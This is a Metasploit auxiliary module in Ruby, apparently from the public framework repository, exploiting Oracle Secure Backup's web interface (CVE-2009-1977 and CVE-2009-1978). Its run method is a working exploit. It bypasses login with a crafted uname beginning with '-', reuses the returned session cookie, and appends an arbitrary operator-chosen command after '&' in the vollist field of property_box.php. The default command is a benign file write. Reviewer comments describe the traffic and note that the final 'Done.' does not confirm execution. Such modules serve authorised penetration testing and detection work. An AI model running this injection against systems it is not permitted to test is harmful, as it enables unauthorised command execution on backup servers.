GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr2.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
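# Auxiliary module for the Oracle Secure Backup web-interface issues tracked as
# CVE-2009-1977 and CVE-2009-1978 (see 'References' below).
#
# What it puts on the wire, for anyone reviewing web-server or proxy logs:
#   1. POST /login.php with a fixed form body whose uname value begins with "-".
#   2. POST /property_box.php whose vollist value is followed by "&" + CMD
#      (passed through Rex::Text.uri_encode), replaying the cookies from step 1.
# The default CMD writes metasploit.txt to %SYSTEMDRIVE% on the target host.
#
# NOTE(review): only 10.3.0.1.0 (Win32) is listed as tested; behaviour against
# other versions or platforms is not established by this file.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the RPORT / CMD / SSL options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability
          in login.php in order to execute arbitrary code via a command injection
          vulnerability in property_box.php. This module was tested
          against Oracle Secure Backup version 10.3.0.1.0 (Win32).
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-1977' ],
          [ 'OSVDB', '55903' ],
          [ 'CVE', '2009-1978' ],
          [ 'OSVDB', '55904' ],
          [ 'ZDI', '09-058' ],
          [ 'ZDI', '09-059' ],
        ],
        'DisclosureDate' => '2009-08-18'
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        # CMD is declared optional (first array element is false), so #run has
        # to cope with it being unset.
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ]
    )
  end

  # Requests a session from /login.php and, if the returned cookies contain a
  # PHPSESSID entry, posts the CMD option to /property_box.php.
  #
  # Neither response body is inspected and the second response is discarded,
  # so the final "Done." is printed whether or not a reply arrives; it is not
  # evidence that the command ran on the target.
  #
  # @return [void]
  def run
    cmd = datastore['CMD']

    # CMD may be unset because the option is optional; "&" + nil would raise
    # TypeError further down. Stop before any traffic is sent.
    if cmd.to_s.strip.empty?
      print_error('CMD is not set; nothing to send.')
      return
    end

    # Second argument is the request timeout in seconds.
    res = send_request_cgi(
      {
        'uri' => '/login.php',
        'data' => 'button=Login&attempt=1&mode=&tab=75&uname=-msf&passwd=msf',
        'method' => 'POST',
      }, 5
    )

    # res is nil when no response came back; treat that the same as a
    # response without a session cookie.
    cookies = res ? res.get_cookies : nil
    if cookies.nil? || !cookies.match(/PHPSESSID=(.*);(.*)/i)
      print_error("Invalid PHPSESSION token..")
      return
    end

    print_status("Sending command: #{cmd}...")

    send_request_cgi(
      {
        'uri' => '/property_box.php',
        'data' => 'type=Sections&vollist=75' + Rex::Text.uri_encode("&" + cmd),
        'cookie' => cookies,
        'method' => 'POST',
      }, 5
    )

    print_status("Done.")
  end
end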